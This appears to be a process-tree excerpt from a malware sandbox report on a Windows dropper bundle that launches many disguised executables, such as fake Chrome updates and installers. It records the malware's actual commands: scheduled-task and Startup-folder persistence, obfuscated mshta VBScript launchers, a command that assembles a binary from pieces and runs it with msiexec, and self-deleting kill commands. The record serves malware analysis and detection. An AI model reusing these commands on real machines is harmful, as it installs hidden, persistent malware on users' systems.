C:\Users\Admin\AppData\Local\Temp\is-KGRII.tmp\Sat223a93262ea5e8d3.tmp"C:\Users\Admin\AppData\Local\Temp\is-KGRII.tmp\Sat223a93262ea5e8d3.tmp" /SL5="$60154,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat223a93262ea5e8d3.exe"2⤵
- Executes dropped EXE
PID:1376
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat221d8ea09eebfe.exeSat221d8ea09eebfe.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2284 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F3⤵
- Creates scheduled task(s)
PID:2812
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\3⤵PID:2780
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\4⤵PID:2908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat224bdd8c5c15.exeSat224bdd8c5c15.exe1⤵
- Executes dropped EXE
PID:1696 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵PID:2668
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"3⤵PID:908
-
-
C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2122.exe"C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2122.exe"3⤵PID:2632
-
C:\Users\Admin\AppData\Roaming\6542280.exe"C:\Users\Admin\AppData\Roaming\6542280.exe"4⤵PID:1012
-
-
C:\Users\Admin\AppData\Roaming\7097430.exe"C:\Users\Admin\AppData\Roaming\7097430.exe"4⤵PID:3392
-
-
C:\Users\Admin\AppData\Roaming\4342298.exe"C:\Users\Admin\AppData\Roaming\4342298.exe"4⤵PID:3408
-
-
C:\Users\Admin\AppData\Roaming\1587167.exe"C:\Users\Admin\AppData\Roaming\1587167.exe"4⤵PID:3452
-
-
C:\Users\Admin\AppData\Roaming\5075556.exe"C:\Users\Admin\AppData\Roaming\5075556.exe"4⤵PID:3712
-
-
C:\Users\Admin\AppData\Roaming\3600180.exe"C:\Users\Admin\AppData\Roaming\3600180.exe"4⤵PID:3868
-
C:\Users\Admin\AppData\Roaming\8885137.exe"C:\Users\Admin\AppData\Roaming\8885137.exe"5⤵PID:3364
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscriPt: clOSE(cREateObject( "wSCrIpt.ShELl" ). RUn ( "cMD.exE /q /R tYPe ""C:\Users\Admin\AppData\Roaming\8885137.exe"" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT& if """" == """" for %p In ( ""C:\Users\Admin\AppData\Roaming\8885137.exe"" ) do taskkill /f /iM ""%~Nxp"" " , 0 ,TrUE ) )6⤵PID:3492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R tYPe "C:\Users\Admin\AppData\Roaming\8885137.exe" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT&if "" == "" for %p In ( "C:\Users\Admin\AppData\Roaming\8885137.exe" ) do taskkill /f /iM "%~Nxp"7⤵PID:1640
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "8885137.exe"8⤵
- Kills process with taskkill
PID:1996
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\2488554.exe"C:\Users\Admin\AppData\Roaming\2488554.exe"5⤵PID:3448
-
C:\Users\Admin\AppData\Roaming\2488554.exe"C:\Users\Admin\AppData\Roaming\2488554.exe"6⤵PID:628
-
-
-
-
C:\Users\Admin\AppData\Roaming\959357.exe"C:\Users\Admin\AppData\Roaming\959357.exe"4⤵PID:4012
-
-
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"3⤵PID:2656
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵PID:3048
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"3⤵PID:1564
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"3⤵PID:2740
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )4⤵PID:396
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"5⤵PID:840
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi6⤵PID:2648
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵PID:992
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"8⤵PID:1096
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )7⤵PID:3748
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC8⤵PID:3840
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"9⤵PID:3924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "9⤵PID:3916
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC9⤵PID:2660
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"6⤵
- Kills process with taskkill
PID:2144
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵PID:2492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit4⤵PID:2792
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f5⤵
- Kills process with taskkill
PID:2408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yangjing-game.exe"C:\Users\Admin\AppData\Local\Temp\yangjing-game.exe"3⤵PID:836
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"3⤵PID:2788
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"3⤵PID:1172
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"3⤵PID:3080
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"3⤵PID:3140
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"3⤵PID:3260
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"4⤵PID:1188
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵PID:2016
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"6⤵
- Creates scheduled task(s)
PID:2216
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵PID:2700
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe6⤵PID:3204
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"7⤵PID:344
-
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2544 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2552
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2716
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1060880762-2126248612779256579-648600213-1559884336-2104860174-1420347790-42508519"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1548
-
C:\Windows\system32\taskeng.exetaskeng.exe {DC7E790D-235A-445B-A719-1126D82C5E51} S-1-5-21-103686315-404690609-2047157615-1000:EDWYFHKN\Admin:Interactive:[1]1⤵PID:4092
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵PID:3196
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3216 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:956
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211123003022.log C:\Windows\Logs\CBS\CbsPersist_20211123003022.cab1⤵PID:3544